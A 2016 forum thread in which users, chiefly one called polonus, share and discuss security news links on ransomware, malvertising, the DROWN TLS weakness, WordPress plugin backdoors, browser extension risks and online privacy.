-
Security This Week: Employers Are Paying Data Firms to Predict Your Health Risks
http://www.wired.com/2016/02/security-this-week-employers-are-paying-data-firms-to-predict-your-health-risks/
-
Major Geeks delists comodo http://www.majorgeeks.com/news/story/comodo_internet_security_removed_from_majorgeeks_downloads.html
-
Major Geeks delists comodo http://www.majorgeeks.com/news/story/comodo_internet_security_removed_from_majorgeeks_downloads.html
Major Geeks has been a favorite download site of mine for a long time. Unlike Download.com and quite a few others, they have always remained a free
and secure place to download programs without any of the trickery we've by now have had to learn to avoid.
My view on Comodo doesn't need to be expressed. Just ask Comodo's fearless leader. :)
-
Malware for mobile devices tripled last year.
https://securelist.com/analysis/kaspersky-security-bulletin/73839/mobile-malware-evolution-2015/
-
Vulnerable shared Baidu development kit creates privacy issues and security leaks for Baidu-browser:
https://citizenlab.org/2016/02/privacy-security-issues-baidu-browser/
Again in this report we see the cooperation with "ClownFlare's halfbaked-SSL" negatively being reported: In July 2014, Baidu formed a partnership with U.S.-based Internet traffic management company CloudFlare, creating a service that leverages Baidu’s Chinese data centres with CloudFlare’s traffic management services to increase traffic speeds across China’s border. The service, called Baidu Yunjiasu (百度云加速) or “Cloud acceleration,” is primarily targeted at businesses seeking to speed up the flow of traffic across China’s inefficient, censorship-heavy network. Part 2 of our analysis below describes a feature of Baidu Browser that proxies traffic to certain websites hosted outside of China to improve performance.
More important is it to mention the vulnerable apps using Baidu Analytics SDK:
ES File Explorer File Manager [com.estrongs.android.pop]
Photo Wonder-Collage Maker [cn.jingling.motu.photowonder]
Azar-Video Chat & Call, Messenger [com.azarlive.android]
ES Task Manager (Task Killer) [com.estrongs.android.taskmanager]
???PPS [tv.pps.mobile]
Meipai [com.meitu.meipaimv]
???? [com.baidu.BaiduMap]
???? [com.baidu.searchbox]
Well File Manager [com.fihtdc.filemanager]
SingPlay: Karaoke your MP3s [com.nexstreaming.app.singplay]
Kwai, the best short video App [com.smile.gifmaker]
Mydol (STAR LOCKSCREEN) [com.wacompany.mydol]
Speedometer GPS [luo.speedometergps]
ES App Locker [com.estrongs.locker] ?????HD [com.qiyi.video.pad]
polonus
-
340 apps on Google Play make you click porn-sites. Developer cat and mouse game - rather large game app fraud campaign: http://www.welivesecurity.com/2016/02/24/google-play-porn-clicker-true-large-scale-campaign/
Google makes a good effort to take such apps off immediately, but in this particular case, the bad guys still have the upper hand.
- Quote from the ESET article by Lukáš Štefanko.
polonus
-
Critical: Drupal core should be patched: https://www.drupal.org/SA-CORE-2016-001
Mind you, 2% of websites globally run this CMS.
polonus
-
[openssl-announce] Forthcoming OpenSSL releases
https://mta.openssl.org/pipermail/openssl-announce/2016-February/000063.html
-
WorldPay too late to mitigate weak encryption on BTA's: ???
Read: https://groups.google.com/forum/?_escaped_fragment_=topic/mozilla.dev.security.policy/RHBHXJOG8Io
Read: https://blog.mozilla.org/security/2016/02/24/payment-processors-still-using-weak-crypto/
link article author = Richard Barnes.
Insecurity condoned where security matters most?
polonus
-
5 Ways Skynet Is More Real Than You Think
http://www.huffingtonpost.com/2015/06/22/skynet-real_n_7042808.html
https://youtu.be/rVlhMGQgDkY
15-20 Skynet is Coming
http://www.hughmorgan.net/2015/12/01/15-20-skynet-coming/
-
Apple Hires Developer of Edward Snowden's Favorite Encrypted Chat App Called 'Signal'
http://www.patentlyapple.com/patently-apple/2016/02/apple-hires-developer-of-edward-snowdens-favorite-encrypted-chat-app-called-signal.html
-
Hi Pondus,
They say "Maybe bot" at your avatar, not definitely one. ;D
polonus
-
Hi Pondus,
They say "Maybe bot" at your avatar, not definitely one. ;D
polonus
Maybe I will be one day?
Brain implant will connect a million neurons with superfast bandwidth
http://www.futuretimeline.net/blog/2016/01/22.htm#.VtBg4JzhDWJ
-
Los Angeles Hospital Hack Raises Concerns About Ransom Attacks
http://www.npr.org/2016/02/22/467704573/los-angeles-hospital-hack-raises-concerns-about-ransom-attacks
Study Finds People Are Dumb, Will Connect to Any Wi-Fi Network
http://gizmodo.com/study-finds-people-are-dumb-will-connect-to-any-wi-fi-1760734633
Locky Ransomware Makes Its First High-Profile Victim As It Continues to Spread
http://news.softpedia.com/news/locky-ransomware-makes-its-first-high-profile-victim-as-it-continues-to-spread-500929.shtml
How to avoid potentially unwanted programs
https://www.malwarebytes.org/articles/how-to-avoid-potentially-unwanted-programs/?utm_source=gplus&utm_medium=social
The Amazon Survey Phish: Back for Round 2
https://blog.malwarebytes.org/fraud-scam/2016/02/the-amazon-survey-phish-back-for-round-2/?utm_source=linkedin&utm_medium=social
-
Los Angeles Hospital Hack Raises Concerns About Ransom Attacks
http://www.npr.org/2016/02/22/467704573/los-angeles-hospital-hack-raises-concerns-about-ransom-attacks
Snip
I'm amazed at the fact that no one seems to wonder why this hospital and all the other institutions aren't prepared for this type of disaster ?
Where are their backups ? Attacks happen, hardware fails, why isn't there a comprehensive backup plan that minimizes the risk ???
Who is more at fault ? The hacker, the hard drive that fails or, the one responsible for guarding the information ???
-
Insecurity seems to be everywhere around:
90% of SSL VPNs use insecure or outdated encryption, putting your data at risk
Read: https://www.htbridge.com/blog/90-percent-of-ssl-vpns-use-insecure-or-outdated-encryption.html
The authors of that article offer a free test here: https://www.htbridge.com/ssl/
polonus
-
This is how it should be almost perfect:
https://www.htbridge.com/ssl/?id=e620b0fe1e9d347ec2ad3cb27ebf946213eee0b320fa8cfe4e68256b30671352
-
Hi Steven Winderlich,
Seems they have that server well configured there in Tampa, FL ;)
polonus
-
More IRS data breach attacks than expected: https://www.irs.gov/uac/Newsroom/IRS-Statement-On-Get-Transcript
Full end-to-end-encryption, time to bring it in, to protect our meta-data against the bad guys.
polonus
-
More IRS data breach attacks than expected: https://www.irs.gov/uac/Newsroom/IRS-Statement-On-Get-Transcript
Full end-to-end-encryption, time to bring it in, to protect our meta-data against the bad guys.
polonus
Using a VPN on a full time basis seems more and more like a great idea. :)
-
Using a VPN on a full time basis seems more and more like a great idea.
+1
This is good and sound advice.
polonus
-
Linux Mint no longer uses WordPress CMS on their website: http://blog.linuxmint.com/?p=2994
Direct access to website CMS was too much of a risk, but a lot of website owners like the easy way better than the secure way.
polonus
-
"Doctor Web": a review of virus activity in February 2016
http://news.drweb.com/show/review/?lng=en&i=9861
-
Linux Mint no longer uses WordPress CMS on their website: http://blog.linuxmint.com/?p=2994
Direct access to website CMS was too much of a risk, but a lot of website owners like the easy way better than the secure way.
polonus
Wappalyzer still lists it tho.
-
`WeirdPress` gonna be more and more insecure.
You are right Steven Winderlich, on their linuxmint blog site they still have it installed.
With a staggering 33,621 plugins downloaded a total of 749,138,518 times in the case of WordPress, the impact of exploiting security vulnerabilities could be huge
Quote by Mark Wilson, one year ago, the situation may even have grown worse now. :o
polonus
-
so much for wireless devices, here goes mousejack exploit https://www.mousejack.com/
more in-depth details https://www.bastille.net/technical-details
-
A basic implementation error will turn major browsers into a real cookie monster,
so cookies set via HTTP requests may allow a remote attacker to bypass HTTPS and reveal private session information”.
Quotes taken from this article: http://www.theregister.co.uk/2015/09/25/cookies_monster_your_security/
article author = Richard Chirgwin
The malicious cookie is under the attacker's control, but even a user who looks through their cookie list might not realise it's a fake - opening the way for the attacker to grab private information.
polonus
-
Most of those cookies are likely to be 3rd party ones I suspect.
One of the other sort of security add-ons for firefox that I use is CookieMonster, this allows a reasonable degree of configuration on what cookies are allowed - particularly 3rd party cookies.
Not to mention, I automatically disable 3rd party cookies in firefox, also when I close firefox any session cookies are removed.
-
There are several extensions for Firefox that allow cookies to be controlled. I use one with the painfully obvious name of Cookie Controller. Works, and stays out of the way most of the time. Most sites I use frequently get my default of 1st-party cookies only, treating all cookies as session (gone when closing the browser). That, plus NoScript with some tuning, keeps attacks to a dull roar but does have side effects in a few places. MS, for instance, blocks access to its "support.microsoft.com" web site if you have cookies or javascript blocked, or even if those extensions are simply present. There are other ways in, if information is needed, so that's an annoyance at worst, but these privacy mechanisms aren't without side effects.
I've tried the Avast extension in FF. It works, but doesn't appear to know that things are already blocked by something else and wants to block again. Then, after a while, everything stops working for some major sites (I think they recognize the Avast extension and throw a fit), but it all starts working again if I drop back to just Cookie Controller and NoScript. Privacy Badger is another good one, and stays mostly out of the way, but its main features are now (with less control) incorporated into FF. Ah well ... why am I reminded of Elmer Fudd trying biocontrol of the bugs in his vegetable patch ...
-
Top 10 rdp password survey: https://community.rapid7.com/community/infosec/blog/2016/03/01/the-attackers-dictionary
polonus
-
Infecting users through malicious ads gets sneakier and sneakier....malware campaigns keep these ads hidden to infest visitors with vulnerable unpatched software on their OS. Fingerprinting code inside ads can discriminate between a real victim to infest and security researchers using a honeypot for instance. Read about it here: https://malwarebytes.app.box.com/Operation-Fingerprint
This again demonstrates that visiting today's Internet can be best done with a decent up to date adblocker up and running.
polonus
-
Keeping your browser, OS and programs updated also goes a long way toward staying safe. :)
-
Linux Mint no longer uses WordPress CMS on their website: http://blog.linuxmint.com/?p=2994
Direct access to website CMS was too much of a risk, but a lot of website owners like the easy way better than the secure way.
polonus
Wappalyzer still lists it tho.
Linux Mint Forums Hacked: https://forums.linuxmint.com/viewtopic.php?f=143&t=217298&sid=9e27bc4310f2a05cc38871aa8de6f814
-
Mozilla blocks add-on that can seriously hamper browser security settings and allow malicious extension to be installed:
https://addons.mozilla.org/en-US/firefox/blocked/i1129
polonus
-
In the line of the DROWn attack insecurity discussion (on vulnerable SSL v.2/SSL v.3 instead of TLS) e-mail server config could be the weakest link. Read: https://security.stackexchange.com/questions/116139/what-is-drown-and-why-is-it-even-possible info credits go to Thomas Pornin:
There is just one thing that seems understated: e-mail servers are broken security-wise... by default and by design.
To check use sslyze: https://github.com/nabla-c0d3/sslyze
Conclusion: At any rate, if you disable SSLv2/3 on your mail server, you are safe from DROWN.
Above quote credit goes to "sleske". :)
polonus
-
WordPress plug-in backdoored to steal your passwords!
The issue with Custom Content Type Manager was detected by Sucuri's.
Read: https://blog.sucuri.net/2016/03/when-wordpress-plugin-goes-bad.html
Check WordPress plug-ins here: https://hackertarget.com/wordpress-security-scan/
or use this extension: Scan WP when the site has been built using WordPress.
WordPress plug-ins are not insecure: http://www.itpro.co.uk/security/24163/the-wordpress-cms-isnt-insecure-you-are
link article author = Davey Winder
Developers are not trained or instructed to develop with security in mind.
Still actuality: http://www.networkworld.com/article/2224843/opensource-subnet/7-of-10-leading-wordpress-plugins-are-vulnerable.html article author = Alin Shimel.
polonus (volunteer website security analyst and website error-hunter)
P.S. Seems the questioned plug-in has been taken down or has been left. ;)
-
Direct deposits rerouted after Illinois State University data breach
http://www.scmagazine.com/illinois-state-university-data-breach-compromised-employee-payments/article/480815/
It’s 2016, so why is the world still falling for Office macro malware?
http://arstechnica.com/security/2016/03/its-2016-so-why-is-the-world-still-falling-for-office-macro-malware/
This was a pain to post. Chrome was taking forever to load. Had to resort to copy/paste Chrome to Firefox.
Somethings Chrome is best...somethings Firefox is best.
-
DROWn Attack Vulnerability gonna produce a lot of threat where you do not expect it:
https://forum.avast.com/index.php?topic=184007.msg1298072#msg1298072
Background info on this attack of the week: http://blog.cryptographyengineering.com/2016/03/attack-of-week-drown.html
link article author: Matthew Green
polonus
-
Majorgeeks.com Support Forum Pwned?
http://forums.majorgeeks.com/index.php?threads/majorgeeks-com-support-forum-pwned.297230/
I received the following in an email today regarding the issue:
http://us4.campaign-archive2.com/?u=11e02cf9dc4ef3eb0ab4606ef&id=d92fa0a408&e=6ddc9fb560
-
Microsoft Security Bulletin Summary for March 2016
https://technet.microsoft.com/en-us/library/security/ms16-mar.aspx
-
KeRanger Is Actually A Rewrite of Linux.Encoder
https://labs.bitdefender.com/2016/03/keranger-is-actually-a-rewrite-of-linux-encoder/
-
Seagate employees’ W-2 forms exposed in another payroll phish
http://arstechnica.com/security/2016/03/seagate-employees-w-2-forms-exposed-in-another-payroll-phish/
It’s 2016, so why is the world still falling for Office macro malware?
http://arstechnica.com/security/2016/03/its-2016-so-why-is-the-world-still-falling-for-office-macro-malware/
How Minecraft undermined my digital defences
http://www.bbc.com/news/technology-34474883
Want Safer Passwords? Don’t Change Them So Often
http://www.wired.com/2016/03/want-safer-passwords-dont-change-often/
-
Firm sells tablet/computers for children with vulnerable Flash Player :o
Read: http://www.mikecarthy.com/offensive-security/childrens-tablet-computer-vulnerable-flash-exploit/
So Polonus would like to know and scanned the firm's server address for DROWn attack vulnerability and DANG.
So our poor kids are additionally also threatened from the DROWn attack :o
see here: https://test.drownattack.com/?site=LeapFrog.com
polonus (volunteer website security analyst and website error-hunter)
-
Firm sells tablet/computers for children with vulnerable Flash Player :o
Read: http://www.mikecarthy.com/offensive-security/childrens-tablet-computer-vulnerable-flash-exploit/
So Polonus would like to know and scanned the firm's server address for DROWn attack vulnerability and DANG.
So our poor kids are additionally also threatened from the DROWn attack :o
see here: https://test.drownattack.com/?site=LeapFrog.com
polonus (volunteer website security analyst and website error-hunter)
http://www.ibtimes.co.uk/leapfrog-weak-security-kid-friendly-tablet-could-leave-children-exposed-online-snooping-1548905
-
Adobe Security Bulletin
https://helpx.adobe.com/security/products/flash-player/apsb16-08.html
-
Cloud service providers are failing when it comes to protecting their clients against the recently disclosed DROWN attack, with only 33 providers having patched their servers from a total of 653 surveyed services: http://news.softpedia.com/news/one-week-later-drown-vulnerability-still-affects-620-of-653-cloud-services-501599.shtml
link article author - Catalin Cimpanu.
polonus
-
Cloud service providers are failing when it comes to protecting their clients against the recently disclosed DROWN attack, with only 33 providers having patched their servers from a total of 653 surveyed services: http://news.softpedia.com/news/one-week-later-drown-vulnerability-still-affects-620-of-653-cloud-services-501599.shtml
link article author - Catalin Cimpanu.
polonus
Not much help when they don't list the effected and patched services.
-
Hi bob3160,
This is one outside that 5.1% patched against DROWn with CloudFlare, Inc. as Netblock owner.
https://test.drownattack.com/?site=ns1.hostmonster.com
You could test here for your cloud service of choice: https://test.drownattack.com/?site=
But DROWn should be patched on all underlying servers and services that share that same certificate and are vulnerable,
that is why that exploit is that lively dangerous. Forgotten to mitigate or patch somewhere or forgotten to disable SSLv2/3 and DANG PRESTO! :o
polonus
P.S. And do not forget to scan your cloud apps: example : https://test.drownattack.com/?site=just.cloud & https://test.drownattack.com/?site=express.vpn and a long row of other vulnerable app services.
Oh, and we have to see this exploit in a clear light as not everybody will spend 400 bucks on resources to be able to compromise to decrypt the key ;) But some parties might take an interest there.... (info credits: Eric Wingfield)
Damian
-
3 year old java bug, still there
Broken security fix in Oracle Java SE 7/8/9
http://seclists.org/fulldisclosure/2016/Mar/31
-
How can you quarrel about mouseclick-surveillance, when we all already got it?
The only discussion is on making that mouse-click surveillance even simpler and more straight-forward,
to do away with all encryption obstacles that might hinder Big Brother´s dragnet.
The rest is just made-up for discussion´s sake.
Re: https://www.eff.org/deeplinks/2016/03/next-front-new-crypto-wars-whatsapp
First it is the iPhone, now it is WhatsApp.
polonus
-
Attacker leaves “SECURITY TIPS” after invading anti-DDoS firm Staminus
https://nakedsecurity.sophos.com/2016/03/15/attacker-leaves-security-tips-after-invading-anti-ddos-firm-staminus/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+nakedsecurity+%28Naked+Security+-+Sophos%29
-
I use firefox with all of the blockers in place, turn off history, run a cookie cleaner and always use startpage as my search engine. I never had an issue. Never had an issue.
-
Large Angler Malvertising Campaign Hits Top Publishers
https://blog.malwarebytes.org/malvertising-2/2016/03/large-angler-malvertising-campaign-hits-top-publishers/?utm_source=linkedin&utm_medium=social
-
Security of AV code is messy, insecure, and not of this time,
it is like hacking like in 1999. That means we´re in peril when the next big threat comes knocking at the door!
Read: http://blog.cmpxchg8b.com/2016/03/security-software-certification.html (link article author = Tavis Ormandy)
Modern security is not what AV has to offer us.
Anyone.
polonus
-
Oh what irony and the so-called innovating software developers that react in that link and run outsourcing for known security services themselves are vulnerable to DROWn attack: https://test.drownattack.com/?site=www.nixsolutions.com
Here the winged words of Para-Noid comes to mind: ´Never trust what you haven´t tested yourself´
polonus
-
95% of https-servers vulnerable to MitM/attacks: http://news.netcraft.com/archives/2016/03/17/95-of-https-servers-vulnerable-to-trivial-mitm-attacks.html
Problem is that most https-sites do not use hsts. You can scan for that like here: https://www.expeditedssl.com/simple-ssl-scanner/scan?target_domain=
In this (random) example it is OK: https://www.expeditedssl.com/simple-ssl-scanner/scan?target_domain=www.marmotex.com
polonus
-
Javascript in transit added to a webpage that was not being addressed via https. :o
They did not like it when the cat came out of the bag:
http://thewire.in/2015/06/09/israeli-firm-strong-arms-indian-techie-for-exposing-suspicious-code-3528/
Wifi HotSpots or a malicious ISP could mean you´re at risk.
polonus
-
Large Angler Malvertising Campaign Hits Top Publishers
https://blog.malwarebytes.org/malvertising-2/2016/03/large-angler-malvertising-campaign-hits-top-publishers/?utm_source=linkedin&utm_medium=social
More on this
http://www.neowin.net/news/crypto-ransomware-hits-major-websites-through-banner-ads-in-past-24-hours
http://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-in-us-leads-to-angler-exploit-kitbedep/
-
Large Angler Malvertising Campaign Hits Top Publishers
https://blog.malwarebytes.org/malvertising-2/2016/03/large-angler-malvertising-campaign-hits-top-publishers/?utm_source=linkedin&utm_medium=social
More on this
http://www.neowin.net/news/crypto-ransomware-hits-major-websites-through-banner-ads-in-past-24-hours
http://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-in-us-leads-to-angler-exploit-kitbedep/
What's out there right now that will keep us safe from this ???
-
Large Angler Malvertising Campaign Hits Top Publishers
https://blog.malwarebytes.org/malvertising-2/2016/03/large-angler-malvertising-campaign-hits-top-publishers/?utm_source=linkedin&utm_medium=social
More on this
http://www.neowin.net/news/crypto-ransomware-hits-major-websites-through-banner-ads-in-past-24-hours
http://blog.trendmicro.com/trendlabs-security-intelligence/malvertising-campaign-in-us-leads-to-angler-exploit-kitbedep/
What's out there right now that will keep us safe from this ???
Well TrendMicro say they detect it
The payload dropped
As of this writing, the exploit kit proceeds to download a BEDEP variant, which, in turn drops a malware we will detect as TROJ_AVRECON.
https://www.virustotal.com/en/file/5df4bce112f1f4019c242ea1515ca55eb76f3590d53d31ec61a7c428671b7ec1/analysis/
Angler Exploit Kit is known to exploit vulnerabilities in Adobe Flash and Microsoft Silverlight, among others.
-
have been waiting for this
Security firm discovers first iOS malware that can infect non-jailbroken iPhones w/o enterprise certificate
http://9to5mac.com/2016/03/17/acedeceiver-iphone-malware/
-
TeslaCrypt 3.0.1
http://blog.talosintel.com/2016/03/teslacrypt-301-tales-from-crypto.html
-
Samas Ransomware Uses Pen Testing Tools for Delivery
http://www.securityweek.com/samas-ransomware-uses-pen-testing-tools-delivery
-
Tavis Ormandy finds up another hole in Trend Micro AV,
probably concerning DirectPass: https://twitter.com/taviso/status/710950508094029824
polonus
-
Google Docs? Check One More Time…
https://blog.malwarebytes.org/fraud-scam/2016/03/google-docs-check-one-more-time/?utm_source=gplus&utm_medium=social
A Look Into Malvertising Attacks Targeting The UK
https://blog.malwarebytes.org/malvertising-2/2016/03/a-look-into-malvertising-attacks-targeting-the-uk/?utm_source=gplus&utm_medium=social
An iCloud scam that may be worse than ransomware
https://blog.malwarebytes.org/mac/2016/03/an-icloud-scam-that-may-be-worse-than-ransomware/?utm_source=linkedin&utm_medium=social
How to beat ransomware: Prevent, don't react
https://www.malwarebytes.org/articles/how-to-beat-ransomware-prevent-dont-react/?utm_source=gplus&utm_medium=social
FBI cautions motorists to “maintain awareness” of automobile hacks
http://arstechnica.com/tech-policy/2016/03/fbi-cautions-motorists-to-maintain-awareness-of-automobile-hacks/
TopFlix: a DNS Unlocker variant
https://blog.malwarebytes.org/online-security/2016/03/topflix-a-dns-unlocker-variant/?utm_source=gplus&utm_medium=social
-
Handing over more of your privacy(mobile phone number etc.) for alleged easy log-in security?
I think it is a bad deal, for your privacy and security wise also, the mobile platform is inherently insecure and fully transparent.
It is presented to you, but not as you might intend it. :(
Read:
https://yahoo-security.tumblr.com/post/141266516770/kill-your-password-with-yahoo-account-key
We gonna be turned more and more into security unaware zombies.
-
Adobe will track you through all of your devices via Adobe marketing cloud.
First it will come to the USA and to Canada and then it is time for Europe to experience this cross device ad-tracking system.
Read: http://www.theregister.co.uk/2016/03/22/adobe_will_track_users_across_devices_with_new_coop_project/
link article author - Tim Anderson
For Yahoo there is an opt-out, but what if some ad platforms don't honor that lifetime opt out?
Another coming attack on that little privacy that is left to you in the Mobile World:
https://iapp.org/news/a/the-privacy-pitfalls-of-cross-device-tracking/ article author - Angelique Carson
Keep your script and adblocker visors up ;)
polonus
-
My question to you all here is how can you protect a little bit of the last vestiges of any privacy you have left when this co-op adtracking comes in.
Now I use the two stage search on mobile devices - so Tap&Trust and AdblockBrowser.
But whenever I block script and ads on my laptop, my co-op Android will give me away.
The gullibility of these adtracking marketeers knows no limits.
What bright developers will come up with some counter measures here to protect us.
polonus
-
My question to you all here is how can you protect a little bit of the last vestiges of any privacy you have left when this co-op adtracking comes in.
Now I use the two stage search on mobile devices - so Tap&Trust and AdblockBrowser.
But whenever I block script and ads on my laptop, my co-op Android will give me away.
The gullibility of these adtracking marketeers knows no limits.
What bright developers will come up with some counter measures here to protect us.
polonus
@ Damien,
There is no privacy on the internet. If you want privacy, you never should have used the internet.
It's too late for all of us. :)
-
@ Damien,
There is no privacy on the internet. If you want privacy, you never should have used the internet.
It's too late for all of us. :)
People should fight for what they want, not give in just because it looks hopeless. :)
-
@ Damien,
There is no privacy on the internet. If you want privacy, you never should have used the internet.
It's too late for all of us. :)
People should fight for what they want, not give in just because it looks hopeless. :)
That's your right even if the hen has already been let out of the henhouse. :)
Once your information is already out there, it's virtually impossible to rake it back in.
-
Well some, like Apple here, like to massage their user opinion to seek some form of damage control, I guess with this.
See: http://arstechnica.co.uk/information-technology/2016/03/report-apple-designing-its-own-servers-to-avoid-snooping/
But when we look at the server security they score only a meagre F-status: https://securityheaders.io/?q=www.apple.com%2Fnl%2F
So why do they start such a discussion as a reaction to this ongoing drama, when their server security status is under par? Read it as a reaction to what was reported here: http://www.reuters.com/article/us-apple-encryption-cellebrite-idUSKCN0WP17J (the Israeli firm failed to react). Is this just putting up more smoke-screens?
So never trust an iPhone or any other device with some info you do not wanna share with the world publicly.
polonus
-
If you have no disc image then forget it
http://blog.trendmicro.com/trendlabs-security-intelligence/petya-crypto-ransomware-overwrites-mbr-lock-users-computers/
-
Webserver security, seems only 0,1% is doing it right: http://www.theregister.co.uk/2016/03/24/see_a_pin_and_pick_it_up_for_the_sake_of_security/
Security headers, not a lot get to A+ status, and many land into the Hall of Shame: https://securityheaders.io/
polonus (volunteer website security analyst and website error-hunter)
-
Further to Petya ransom ware
It is important to note that there is a lot of bad information on the web about how how to fix your computer when it has been encrypted by Petya. Many of these sites state that you can use the FixMBR command or repair your MBR to remove the infection. Though this will indeed remove the lock screen, it will not decrypt your MFT and thus your files and Windows will still be inaccessible. Only repair the MBR if you do not care about any lost data and want to reinstall Windows.
The MFT (Master File Table) is sometimes corrupted. If Microsoft's Checkdisk (chkdsk) failed to repair the MFT, run TestDisk. In the Advanced menu, select your NTFS partition, choose Boot, then Repair MFT. TestDisk will compare the MFT and MFT mirror (its backup). If the MFT is damaged, it will try to repair the MFT using the backup. If the MFT backup is damaged, it will use the main MFT.
If both MFT and MFTMirr are damaged and thus cannot be repaired using TestDisk,
http://www.bleepingcomputer.com/news/security/petya-ransomware-skips-the-files-and-encrypts-your-hard-drive-instead/
-
Google Safebrowsing - Enhancing state-sponsored attack warnings: https://security.googleblog.com/2016/03/more-encryption-more-notifications-more.html
pol
-
Sophisticated USB Trojan Spotted in the Wild
http://www.securityweek.com/sophisticated-usb-trojan-spotted-wild
http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/
Samples used by ESET
-
See why hacking a human is easier: http://computerworld.nl/uploads/z/c/zc67z0r97i9bmqx1.png (link from SmartFile dot com)
polonus
-
App Critical Security Update: http://blog.truecaller.com/security-update-notification/
pol
-
major Samba exploit inbound http://badlock.org/
reveal at April 12th
-
SSL Security. SSL should be a word of the past now. The recent protocol is TLS.
Look in the 'virus and worms' for all the security issues I came up with there in various postings.
We also almost drown in `DROWn´, mainly in nameservers and for reversed DNS.
It is almost a free security course for those interested ;) but the amount of incompetence is often shocking
and might set your security and privacy further at risk.
Data hunger in an insecure environment is as real a threat as threats can be.
polonus
-
New ransomware ”PowerWare” uses native Windows function to encrypt files
http://www.myce.com/news/new-ransomware-powerware-uses-native-windows-function-encrypt-files-78976/?utm_content=bufferefc7f&utm_medium=social&utm_source=facebook.com&utm_campaign=buffer
Two days ago
https://www.virustotal.com/en/file/02beca974ecc4f871d8d42462ef305ae595fb6906ad764e6e5b6effe5ff05f29/analysis/
-
Hej Pondus,
I heard that Windows end-users could adapt their registry to be protected against that form of ransom malware threat. Probably essexboy knows how to implement this? Some AV will brew up some anti-ransomware vaccination. Will Avast? It is getting to be a big problem for some.
polonus
-
Light reading here http://www.windowsecurity.com/articles-tutorials/windows_os_security/PowerShell-Security.html
Theoretically a .ps should not run unless the shell is running
Another default setting that is directly related to security is the fact that all scripts must be run interactively. This is a security measure that ensures that PowerShell scripts cannot be executed from a script based virus. This means that you must be at the PowerShell interface and run the script in real time for it to function.
However, there have been powershell scripts running from the registry
-
Thank you, essex, for setting this out to us.
No reason to panic, but we must take care
and keep all hands on deck.
polonus
-
A Look Back on Misleading Advertising
https://blog.malwarebytes.org/cybercrime/2016/03/a-look-back-on-misleading-advertising/?utm_source=gplus&utm_medium=social
Top Exploit Kits Round Up | March Edition
https://blog.malwarebytes.org/threat-analysis/exploits-threat-analysis/2016/03/top-exploit-kits-round-up-march-edition/?utm_source=gplus&utm_medium=social
-
Alert from my daily scanning experiences:
Loads of servers do not have this Public-Key-Pins set. Also CloudFlare has this insecurity! This we can establish from a Symantec Crypto URL Scan on the Certificate(s): Public-Key-Pins HTTP Public Key Pinning protects your site from MiTM attacks using rogue X.509 certificates. By whitelisting only the identities that the browser should trust, your users are protected in the event a certificate authority is compromised. Certificate is not in Google's EV whitelist.
polonus (volunteer website security analyst and website error-hunter)
-
https://twitter.com/PayloadSecurity/status/717088767396462592
https://www.hybrid-analysis.com/sample/ec08037187d4fad9476e7ee742d226f97ab2f0a7e82964e16a7716076675c350?environmentId=1
More info in Spanish: http://nyxbone.com/malware/russianRansom.html
-
Are Exploit Kits Doomed? New F-Secure Threat Report Says Yes
https://www.f-secure.com/en/web/press_global/news/news-archive/-/journal_content/56/1075444/1551427?p_p_auth=Afyyx1oa&refererPlid=1081937
Exploits, which have become one of the most common vehicles for malware in the past decade, need out-of-date software in order to accomplish their goal of getting through security holes. But that software, Sullivan says, will be harder and harder to find. For example, with HTML 5's capability to "do it all", the need for third party browser plugins has mostly been eliminated. And today's browsers themselves are auto-updated, without the need for the user to intervene, so users always have the latest version.
-
Are Exploit Kits Doomed? New F-Secure Threat Report Says Yes
https://www.f-secure.com/en/web/press_global/news/news-archive/-/journal_content/56/1075444/1551427?p_p_auth=Afyyx1oa&refererPlid=1081937
Exploits, which have become one of the most common vehicles for malware in the past decade, need out-of-date software in order to accomplish their goal of getting through security holes. But that software, Sullivan says, will be harder and harder to find. For example, with HTML 5's capability to "do it all", the need for third party browser plugins has mostly been eliminated. And today's browsers themselves are auto-updated, without the need for the user to intervene, so users always have the latest version.
As we can see here, auto-updates is a good thing.
Why isn't it also considered good when Avast decided to implement it with its program ??? "Program updates will now be set to Auto by default."
-
Firefox browser is in need of a new secure extension sandbox. Why? Read here: http://www.theregister.co.uk/2016/04/04/top_firefox_extensions_can_hide_silent_malware_using_easy_prefab_tool/
polonus
-
Firefox browser is in need of a new secure extension sandbox. Why? Read here: http://www.theregister.co.uk/2016/04/04/top_firefox_extensions_can_hide_silent_malware_using_easy_prefab_tool/
polonus
By now, we should all have realized that the only way to be totally safe from all of the dangers of the internet,
is to totally avoid ever visiting it. Since that's impossible unless you want to become a total hermit, we simply need to accept
that using modern technology and browsing the internet also exposes us to certain dangers.
We can only learn to minimize these dangers. We can never totally avoid them with out avoiding the internet.
-
One out of five businesses are infected by Malware through Social Media
http://www.pandasecurity.com/mediacenter/social-media/uh-oh-one-out-of-five-businesses-are-infected-by-malware-through-social-media/
-
Internet giants join forces to reinforce email security with a new protocol
http://www.pandasecurity.com/mediacenter/security/internet-giants-join-forces-to-reinforce-the-email-with-a-new-protocol/
-
FBI spills iPhone hacking secret to Senators
http://www.cnet.com/news/fbi-spills-iphone-hacking-secret-to-senators/?ftag=CAD1acfa04&bhid=19917032625079717126003489967847
Now everyone will know. :o The crooks already knew how. :)
-
Giorgio Maone, the developer of NoScript, in a reaction to the new extension insecurity found up for firefox extensions:
https://hackademix.net/2016/04/08/crossfud-an-analysis-of-inflated-research-and-sloppy-reporting/
It needs the eye of the experienced security researcher to smell out code with malicious intent right away.
And I can agree that hearing a lot of script music will make you better discern between real music and dissonants,
aka benevolent coding and code wrought by malcreants for malicious purposes.
A whitelisting of browser extensions however could be a good thing, I do not like mine to come with hidden crap like adware etc.
pol
-
Various Malware Including Crypto Ransomware Now Used in Email Phishing Scams
http://www.trendmicro.no/vinfo/no/security/news/cybercrime-and-digital-threats/various-malware-including-crypto-ransomware-now-used-in-email-phishing-scams
-
What security admins are putting off but better should implement right away: http://www.theregister.co.uk/2016/04/08/weekend_reading_five_security_things_youre_not_doing_but_should/
Article by Darren Pauli on advice by SANS' Johannes Ullrich.
polonus
-
End2end encryption may be on the line: http://www.theregister.co.uk/2016/04/08/draft_of_encryptionborking_bill_floated/
"For the first time in America, companies who want to provide their customers with stronger security would not have that choice – they would be required to decide how to weaken their products to make you less safe."
For one thing, it will kill end-to-end encryption.
polonus
-
seems like this went unnoticed (if anyone posted sorry, I didn't see)
http://www.theregister.co.uk/2016/04/04/spies_rejoice_gmail_facebook_messenger_breached_once_again/
